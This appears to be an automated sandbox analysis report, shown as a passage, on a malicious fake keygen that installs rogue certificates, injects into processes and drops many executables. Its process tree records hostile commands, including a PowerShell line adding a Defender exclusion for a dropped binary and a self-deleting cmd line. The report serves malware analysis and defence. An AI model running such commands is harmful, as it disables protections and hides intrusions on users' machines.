6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe Key created \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B lf2lsaeghdu.exe Set value (data) \REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 0300000001000000140000008d4c4a23ba9ee84ea7348fa98cc6e65fbb69de7b140000000100000014000000bbaf7e023dfaa6f13c848eadee3898ecd93232d4040000000100000010000000ab9b109ce8934f11e7cd22ed550680da0f0000000100000030000000a768343c4aeaced5c72f3571938864983a67ed49031c1da2495863caf65fe507011f7f0e70b6cb40e5631c07721be03419000000010000001000000082218ffb91733e64136be5719f57c3a15c0000000100000004000000001000001800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa24b0000000100000044000000420032004600410046003700360039003200460044003900460046004200440036003400450044004500330031003700450034003200330033003400420041005f0000002000000001000000820500003082057e30820466a003020102021067def43ef17bdae24ff5940606d2c084300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a308185310b3009060355040613024742311b30190603550408131247726561746572204d616e636865737465723110300e0603550407130753616c666f7264311a3018060355040a1311434f4d4f444f204341204c696d69746564312b302906035504031322434f4d4f444f205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010091e85492d20a56b1ac0d24ddc5cf446774992b37a37d23700071bc53dfc4fa2a128f4b7f1056bd9f7072b7617fc94b0f17a73de3b00461eeff1197c7f4863e0afa3e5cf993e6347ad9146be79cb385a0827a76af7190d7ecfd0dfa9c6cfadfb082f4147ef9bec4a62f4f7f997fb5fc674372bd0c00d689eb6b2cd3ed8f981c14ab7ee5e36efcd8a8e49224da436b62b855fdeac1bc6cb68bf30e8d9ae49b6c6999f878483045d5ade10d3c4560fc32965127bc67c3ca2eb66bea46c7c720a0b11f65de4808baa44ea9f283463784ebe8cc814843674e722a9b5cbd4c1b288a5c227bb4ab98d9eee05183c309464e6d3e99fa9517da7c3357413c8d51ed0bb65caf2c631adf57c83fbce95dc49baf4599e2a35a24b4baa9563dcf6faaff4958bef0a8fff4b8ade937fbbab8f40b3af9e843421e89d884cb13f1d9bbe18960b88c2856ac141d9c0ae771ebcf0edd3da996a148bd3cf7afb50d224cc01181ec563bf6d3a2e25bb7b204225295809369e88e4c65f191032d707402ea8b671529695202bbd7df506a5546bfa0a328617f70d0c3a2aa2c21aa47ce289c064576bf821827b4d5aeb4cb50e66bf44c867130e9a6df1686e0d8ff40ddfbd042887fa3333a2e5c1e41118163ce18716b2beca68ab7315c3a6a47e0c37959d6201aaff26a98aa72bc574ad24b9dbb10fcb04c41e5ed1d3d5e289d9cccbfb351daa747e584530203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e04160414bbaf7e023dfaa6f13c848eadee3898ecd93232d4300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c050003820101007ff25635b06d954a4e74af3ae26f018b87d33297edf840d2775311d7c7162ec69de64856be80a9f8bc78d2c86317ae8ced1631fa1f18c90ec7ee48799fc7c9b9bccc8815e36861d19f1d4b6181d7560463c2086926f0f0e52fdfc00a2ba905f4025a6a89d7b4844295e3ebf776205e35d9c0cd2508134c71388e87b0338491991e91f1ac9e3fa71d60812c364154a0e246060bac1bc799368c5ea10ba49ed9424624c5c55b81aeada0a0dc9f36b88dc21d15fa88ad8110391f44f02b9fdd10540c0734b136d114fd07023dff7255ab27d62c814171298d41f450571a7e6560afcbc5287698aeb3a853768be621526bea21d0840e494e8853da922ee71d0866d7 lf2lsaeghdu.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC vpn.tmp Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be vpn.tmp Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA vpn.tmp -
Runs ping.exe 1 TTPs 6 IoCs
pid Process 2080 PING.EXE 5200 PING.EXE 5384 PING.EXE 4704 PING.EXE 10108 PING.EXE 13116 PING.EXE -
Script User-Agent 13 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 352 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 546 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 648 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 650 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 651 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 652 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 169 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 172 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 345 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 541 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 628 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 644 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 646 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3680 setups.tmp 3680 setups.tmp 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 4728 rundll32.exe 4728 rundll32.exe 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 3816 multitimer.exe 900 svchost.exe 900 svchost.exe 3692 B471.tmp.exe 3692 B471.tmp.exe 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 4736 IBInstaller_97039.tmp 4736 IBInstaller_97039.tmp 5264 elrtzrqbdi1.tmp 5264 elrtzrqbdi1.tmp 2512 win1host.exe 2512 win1host.exe 2512 win1host.exe 2512 win1host.exe 4732 AdvancedRun.exe 4732 AdvancedRun.exe 4732 AdvancedRun.exe 4732 AdvancedRun.exe 2064 jfiag3g_gg.exe 2064 jfiag3g_gg.exe 3784 setups.tmp 3784 setups.tmp 4768 rundll32.exe 4768 rundll32.exe 4684 rundll32.exe 4684 rundll32.exe 4180 AdvancedRun.exe 4180 AdvancedRun.exe 4180 AdvancedRun.exe 4180 AdvancedRun.exe 5936 GO7uHb4oo.exe 5936 GO7uHb4oo.exe 5044 powershell.exe 5044 powershell.exe 5044 powershell.exe 1472 1.exe 1472 1.exe 1472 1.exe 1472 1.exe 5044 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 4328 MicrosoftEdgeCP.exe 4328 MicrosoftEdgeCP.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1356 Setup.exe Token: SeCreateTokenPrivilege 2900 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 2900 askinstall20.exe Token: SeLockMemoryPrivilege 2900 askinstall20.exe Token: SeIncreaseQuotaPrivilege 2900 askinstall20.exe Token: SeMachineAccountPrivilege 2900 askinstall20.exe Token: SeTcbPrivilege 2900 askinstall20.exe Token: SeSecurityPrivilege 2900 askinstall20.exe Token: SeTakeOwnershipPrivilege 2900 askinstall20.exe Token: SeLoadDriverPrivilege 2900 askinstall20.exe Token: SeSystemProfilePrivilege 2900 askinstall20.exe Token: SeSystemtimePrivilege 2900 askinstall20.exe Token: SeProfSingleProcessPrivilege 2900 askinstall20.exe Token: SeIncBasePriorityPrivilege 2900 askinstall20.exe Token: SeCreatePagefilePrivilege 2900 askinstall20.exe Token: SeCreatePermanentPrivilege 2900 askinstall20.exe Token: SeBackupPrivilege 2900 askinstall20.exe Token: SeRestorePrivilege 2900 askinstall20.exe Token: SeShutdownPrivilege 2900 askinstall20.exe Token: SeDebugPrivilege 2900 askinstall20.exe Token: SeAuditPrivilege 2900 askinstall20.exe Token: SeSystemEnvironmentPrivilege 2900 askinstall20.exe Token: SeChangeNotifyPrivilege 2900 askinstall20.exe Token: SeRemoteShutdownPrivilege 2900 askinstall20.exe Token: SeUndockPrivilege 2900 askinstall20.exe Token: SeSyncAgentPrivilege 2900 askinstall20.exe Token: SeEnableDelegationPrivilege 2900 askinstall20.exe Token: SeManageVolumePrivilege 2900 askinstall20.exe Token: SeImpersonatePrivilege 2900 askinstall20.exe Token: SeCreateGlobalPrivilege 2900 askinstall20.exe Token: 31 2900 askinstall20.exe Token: 32 2900 askinstall20.exe Token: 33 2900 askinstall20.exe Token: 34 2900 askinstall20.exe Token: 35 2900 askinstall20.exe Token: SeDebugPrivilege 1348 taskkill.exe Token: SeDebugPrivilege 3816 multitimer.exe Token: SeDebugPrivilege 3252 MicrosoftEdge.exe Token: SeDebugPrivilege 3252 MicrosoftEdge.exe Token: SeDebugPrivilege 3252 MicrosoftEdge.exe Token: SeDebugPrivilege 3252 MicrosoftEdge.exe Token: SeDebugPrivilege 4396 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4396 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4396 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4396 MicrosoftEdgeCP.exe Token: SeDebugPrivilege 4728 rundll32.exe Token: SeTcbPrivilege 900 svchost.exe Token: SeDebugPrivilege 4728 rundll32.exe Token: SeDebugPrivilege 4728 rundll32.exe Token: SeDebugPrivilege 4728 rundll32.exe Token: SeDebugPrivilege 4728 rundll32.exe Token: SeDebugPrivilege 4728 rundll32.exe Token: SeDebugPrivilege 4728 rundll32.exe Token: SeDebugPrivilege 4728 rundll32.exe Token: SeDebugPrivilege 4728 rundll32.exe Token: SeDebugPrivilege 4728 rundll32.exe Token: SeDebugPrivilege 4728 rundll32.exe Token: SeDebugPrivilege 4728 rundll32.exe Token: SeDebugPrivilege 4728 rundll32.exe Token: SeDebugPrivilege 4632 multitimer.exe Token: SeLockMemoryPrivilege 2504 msiexec.exe Token: SeLockMemoryPrivilege 2504 msiexec.exe Token: SeManageVolumePrivilege 4584 md2_2efs.exe Token: SeDebugPrivilege 5896 MicrosoftEdgeCP.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 5336 Setup3310.tmp 5656 lf2lsaeghdu.exe 5632 vpn.tmp 4736 IBInstaller_97039.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5264 elrtzrqbdi1.tmp 5512 vict.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp 5632 vpn.tmp -
Suspicious use of SetWindowsHookEx 42 IoCs
pid Process 3896 setups.exe 3680 setups.tmp 3252 MicrosoftEdge.exe 4328 MicrosoftEdgeCP.exe 4328 MicrosoftEdgeCP.exe 5108 gcttt.exe 2040 elrtzrqbdi1.exe 5264 elrtzrqbdi1.tmp 5280 Setup3310.exe 5336 Setup3310.tmp 5452 vict.exe 5512 vict.tmp 5596 vpn.exe 5632 vpn.tmp 5764 IBInstaller_97039.exe 4736 IBInstaller_97039.tmp 4804 winlthsth.exe 2512 win1host.exe 2716 Setup.exe 644 hjjgaa.exe 1408 RunWW.exe 4316 jg7_7wjg.exe 4280 LabPicV3.exe 5664 lylal220.exe 5040 guihuali-game.exe 3580 LabPicV3.tmp 5400 lylal220.tmp 5572 22.exe 184 jfiag3g_gg.exe 4732 AdvancedRun.exe 5936 GO7uHb4oo.exe 4812 1a8L2Mn3F.exe 2064 jfiag3g_gg.exe 6112 setups.exe 3784 setups.tmp 2804 tapinstall.exe 6564 client32.exe 7004 prolab.exe 7144 prolab.tmp 6240 irecord.exe 8 irecord.tmp 4796 tapinstall.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 580 wrote to memory of 992 580 My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe 78 PID 580 wrote to memory of 992 580 My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe 78 PID 580 wrote to memory of 992 580 My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe 78 PID 992 wrote to memory of 500 992 cmd.exe 81 PID 992 wrote to memory of 500 992 cmd.exe 81 PID 992 wrote to memory of 500 992 cmd.exe 81 PID 992 wrote to memory of 2792 992 cmd.exe 82 PID 992 wrote to memory of 2792 992 cmd.exe 82 PID 992 wrote to memory of 2792 992 cmd.exe 82 PID 992 wrote to memory of 3844 992 cmd.exe 83 PID 992 wrote to memory of 3844 992 cmd.exe 83 PID 992 wrote to memory of 3844 992 cmd.exe 83 PID 992 wrote to memory of 2180 992 cmd.exe 84 PID 992 wrote to memory of 2180 992 cmd.exe 84 PID 992 wrote to memory of 2180 992 cmd.exe 84 PID 500 wrote to memory of 4040 500 keygen-pr.exe 85 PID 500 wrote to memory of 4040 500 keygen-pr.exe 85 PID 500 wrote to memory of 4040 500 keygen-pr.exe 85 PID 2180 wrote to memory of 1356 2180 keygen-step-4.exe 86 PID 2180 wrote to memory of 1356 2180 keygen-step-4.exe 86 PID 4040 wrote to memory of 2652 4040 key.exe 87 PID 4040 wrote to memory of 2652 4040 key.exe 87 PID 4040 wrote to memory of 2652 4040 key.exe 87 PID 3844 wrote to memory of 1192 3844 keygen-step-3.exe 88 PID 3844 wrote to memory of 1192 3844 keygen-step-3.exe 88 PID 3844 wrote to memory of 1192 3844 keygen-step-3.exe 88 PID 1192 wrote to memory of 2080 1192 cmd.exe 90 PID 1192 wrote to memory of 2080 1192 cmd.exe 90 PID 1192 wrote to memory of 2080 1192 cmd.exe 90 PID 1356 wrote to memory of 3816 1356 Setup.exe 91 PID 1356 wrote to memory of 3816 1356 Setup.exe 91 PID 1356 wrote to memory of 3896 1356 Setup.exe 92 PID 1356 wrote to memory of 3896 1356 Setup.exe 92 PID 1356 wrote to memory of 3896 1356 Setup.exe 92 PID 3896 wrote to memory of 3680 3896 setups.exe 94 PID 3896 wrote to memory of 3680 3896 setups.exe 94 PID 3896 wrote to memory of 3680 3896 setups.exe 94 PID 2180 wrote to memory of 2900 2180 keygen-step-4.exe 93 PID 2180 wrote to memory of 2900 2180 keygen-step-4.exe 93 PID 2180 wrote to memory of 2900 2180 keygen-step-4.exe 93 PID 2900 wrote to memory of 1532 2900 askinstall20.exe 95 PID 2900 wrote to memory of 1532 2900 askinstall20.exe 95 PID 2900 wrote to memory of 1532 2900 askinstall20.exe 95 PID 1532 wrote to memory of 1348 1532 cmd.exe 98 PID 1532 wrote to memory of 1348 1532 cmd.exe 98 PID 1532 wrote to memory of 1348 1532 cmd.exe 98 PID 2180 wrote to memory of 4540 2180 keygen-step-4.exe 103 PID 2180 wrote to memory of 4540 2180 keygen-step-4.exe 103 PID 2180 wrote to memory of 4540 2180 keygen-step-4.exe 103 PID 4540 wrote to memory of 4612 4540 Full Program Features.exe 104 PID 4540 wrote to memory of 4612 4540 Full Program Features.exe 104 PID 4540 wrote to memory of 4612 4540 Full Program Features.exe 104 PID 2180 wrote to memory of 4648 2180 keygen-step-4.exe 105 PID 2180 wrote to memory of 4648 2180 keygen-step-4.exe 105 PID 2180 wrote to memory of 4648 2180 keygen-step-4.exe 105 PID 4612 wrote to memory of 4728 4612 WScript.exe 106 PID 4612 wrote to memory of 4728 4612 WScript.exe 106 PID 4612 wrote to memory of 4728 4612 WScript.exe 106 PID 4728 wrote to memory of 900 4728 rundll32.exe 69 PID 900 wrote to memory of 4852 900 svchost.exe 107 PID 900 wrote to memory of 4852 900 svchost.exe 107 PID 4728 wrote to memory of 2828 4728 rundll32.exe 23 PID 900 wrote to memory of 4852 900 svchost.exe 107 PID 4728 wrote to memory of 68 4728 rundll32.exe 9
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:68
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Modifies registry class
PID:2828
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2772
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵PID:2720
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵PID:2444
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2428
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1960
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1392
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1236
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1180
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1064
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:808
-
C:\Users\Admin\AppData\Local\Temp\My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe"C:\Users\Admin\AppData\Local\Temp\My.Lockbox.2.7.7.Christmas.Edi.serials.generator.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:992 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:500 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4040 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵PID:2652
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:2792
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3844 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1192 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2080
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\ND7OKOJ003\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ND7OKOJ003\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3816 -
C:\Users\Admin\AppData\Local\Temp\ND7OKOJ003\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ND7OKOJ003\multitimer.exe" 1 3.1617432245.60680eb59572c 1016⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\ND7OKOJ003\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ND7OKOJ003\multitimer.exe" 2 3.1617432245.60680eb59572c7⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Suspicious use of AdjustPrivilegeToken
PID:4632 -
C:\Users\Admin\AppData\Local\Temp\aw3htc04bey\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\aw3htc04bey\KiffApp1.exe"8⤵
- Executes dropped EXE
PID:4188
-
-
C:\Users\Admin\AppData\Local\Temp\3qorlst3ho2\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\3qorlst3ho2\cpyrix.exe" /VERYSILENT8⤵PID:5108
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1472 -
C:\Users\Admin\AppData\Local\Temp\25231360-9afc-4b66-aed9-20792d2f1396\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\25231360-9afc-4b66-aed9-20792d2f1396\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\25231360-9afc-4b66-aed9-20792d2f1396\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4732 -
C:\Users\Admin\AppData\Local\Temp\25231360-9afc-4b66-aed9-20792d2f1396\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\25231360-9afc-4b66-aed9-20792d2f1396\AdvancedRun.exe" /SpecialRun 4101d8 473211⤵
- Suspicious behavior: EnumeratesProcesses
PID:4180
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵
- Suspicious behavior: EnumeratesProcesses
PID:5044
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵PID:5528
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:6272
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:6716
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1472 -s 105210⤵
- Drops file in Windows directory
- Program crash
PID:6840
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5708 -
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:1252
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1wcj0tml3yg\elrtzrqbdi1.exe"C:\Users\Admin\AppData\Local\Temp\1wcj0tml3yg\elrtzrqbdi1.exe" /VERYSILENT8⤵
- Executes dropped EXE
